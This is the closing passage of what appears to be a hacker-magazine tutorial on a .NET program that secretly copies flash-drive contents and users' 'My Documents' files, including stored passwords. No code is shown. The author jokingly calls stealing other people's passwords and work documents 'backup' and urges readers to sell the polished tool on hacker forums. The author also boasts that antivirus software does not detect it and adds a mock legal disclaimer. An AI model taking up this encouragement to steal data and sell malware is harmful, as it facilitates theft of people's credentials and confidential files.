.NET technology has greatly simplified our task; as a result, all the coding has come down to calling a few methods. Of course, you may say that this isn't cool and that such things are much more efficient to write in WinAPI or assembler. In some ways I agree with you, but bear in mind that in WinAPI, and especially in assembler, you won't write such a program this quickly. While others write kilometre-long code, you and I will be harvesting. Good luck in programming, and if you have any questions, write to me by e-mail.

Don't forget that many users store confidential information in the "My Documents" folder. At a minimum there may be interesting work documents, and sometimes entire files with passwords. Once (at my former job) I found on an accountant's computer a neatly formatted file with passwords for bank clients.

As a true friend, you have to help all these people back up their sensitive information.

Many hacker forums have plenty of ads for the sale of this kind of software, at various prices, from $10 to $100. By polishing the examples discussed in the article, you could earn a crust of black bread with caviar. I repeat: the main thing is to approach the matter creatively, and everything will certainly work out. Again, it is not detected by antiviruses ;).

Warning!

We use this program exclusively for timely backup of the contents of flash drives to disk and backup of passwords to a flash drive. What did you think? Illegal use of such software is punishable!